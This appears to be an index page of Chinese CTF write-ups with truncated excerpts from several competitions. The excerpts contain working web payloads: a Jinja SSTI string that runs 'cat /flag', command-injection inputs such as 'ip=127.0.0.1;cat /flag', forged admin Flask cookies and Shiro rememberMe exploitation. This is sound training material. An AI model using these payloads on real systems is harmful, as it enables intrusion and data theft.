?CTF-WP
...
NewStarCTF-WP
...
NDCTF-WP
WEBezpython源码找到路由/s3c0nd,进去发现需要fuzz,(直接盲猜114514结果对了),再进去是个ssti,直接打就行 GET:name={{lipsum.__globals__['os'].popen('cat /flag').read()}} ctfplus{6b0f159b-165b-4d18-86ae-5a49709ea088} MISC签到先base64解码,然后去查这个域名的txt记录 dig TXT...
LilCTF-WP
WEB689eca0d-0acd-8ac8-69e6-6d696e006c7e curl -v "http://http://challenge.xinshi.fun:35914/api/file/download/72ddc765-caf6-43e3-941e-eeddf924f8df" -o avatar.webp {'_flashes': [('success', '登陆成功,欢迎!')], 'is_admin': True, 'user_id': 2, 'username': 'admin'}flask-unsign --sign --cookie "{'_flashes': [('success', '登陆成功,欢迎!')], 'is_admin': True,...
MoeCTF-WP
0 Web入门指北直接放控制台回车就行 moectf{jv@vScr1p7_14_so0o0o0o_inT3r3&t!!!} 01 第一章 神秘的手镯只有前端验证,网络响应或者是直接控制台输入都行 document.getElementById('passwordInput').value =...
磐石行动-WP
WEBezDecryption源码中找到提示2025,就是第一步验证码答案 抓包修改step2为step3进入第三关 分析源码中js文件,在控制台中分析获得第一段为panshi 第二段base64解码后为2oZ5 发包获得flag flag{d1g1t4l_l0ck_br34k3r_2025} 1web-jaba_ezMISC1derderjiaeasy_miscBinwalk提取图片获得压缩包,里面是ook编码,解密获得y0u_c@t_m3!!!,就是压缩包密码,解压获得flagflag{3088eb0b-6e6b-11ed-9a10-145afc243ea2} 1两个数level1尝试直接二进制转ascii不行,那就尝试按位反转后补齐转ascii # 给定的二进制串列表binary_strings = [ "1100001", "000011", "0111011", "1110011", "0100111",...
NepCTF-WP
JavaSeri签到题,借这个题顺便解决了哈shiro框架工具不能正常使用的历史遗留问题,最后发现java版本1.8.0_321能够正常使用 这个题登录之后看到熟悉的rememberMe,直接工具一把梭,爆破密钥加爆破利用链及回显再执行命令就行了 flag{e22d3fa1-4a94-1155-e387-9b8744455d70} easyGooGooVVVY参考ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 - twsec -...
0xGame-WP
...
L3HCTF-WP
best_profile先分析源码,发现在app.py中存在如下代码 @app.route("/get_last_ip/<string:username>", methods=["GET", "POST"])def route_check_ip(username): if not current_user.is_authenticated: return "You need to login first." user = User.query.filter_by(username=username).first() if not user: return "User not found." return render_template("last_ip.html", last_ip=user.last_ip)geoip2_reader =...
MOVECTF-WP
RCELABS-0 flag{3s2wvash-ps8i-42r-8idu-29lukzyaulna} RCELABS-1a=system("tac /flag"); flag{jrifs3wu-dsqq-4hr-8pmw-lojok3hevw9a} RCELABS-2GET:action=submitPOST:content=system("cat /flag") flag{qicmdfa6-qphh-4rz-8dze-uyq1k5icrha5} RCELABS-3a=cat /flag flag{x88vasgf-jsvy-4ga-8mlb-wbot5g7mh20c} RCELABS-4ip=127.0.0.1;cat /flag flag{sy2wwv2g-fk61-47z-8pic-m2uof4pfi7ko} RCELABS-5cmd=cat...